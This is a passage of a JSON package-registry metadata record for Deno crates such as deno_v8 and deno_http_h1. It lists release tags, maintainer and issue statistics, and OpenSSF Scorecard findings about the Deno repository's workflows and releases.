v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T09:36:56.177Z","dependent_packages_count":0,"downloads":13130,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.07368341746403,"dependent_repos_count":12.890314763135011,"dependent_packages_count":17.026152305552852,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":39.66338349538396},"purl":"pkg:cargo/deno_v8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_v8","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_v8","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_v8/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_v8/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-08-04T16:47:03.114Z","updated_at":"2026-08-04T16:47:03.114Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-08-04T16:47:03.117Z","updated_at":"2026-08-04T16:47:03.117Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14616657,"name":"deno_http_h1","ecosystem":"cargo","description":"HTTP/1 protocol pieces for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":7,"first_release_published_at":"2026-06-11T12:31:05.152Z","latest_release_published_at":"2026-08-06T11:47:32.251Z","latest_release_number":"0.8.0","last_synced_at":"2026-08-29T21:57:24.960Z","created_at":"2026-06-11T14:04:20.657Z","updated_at":"2026-08-31T09:36:56.177Z","registry_url":"https://crates.io/crates/deno_http_h1/","install_command":"cargo install deno_http_h1","documentation_url":"https://docs.rs/deno_http_h1/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using 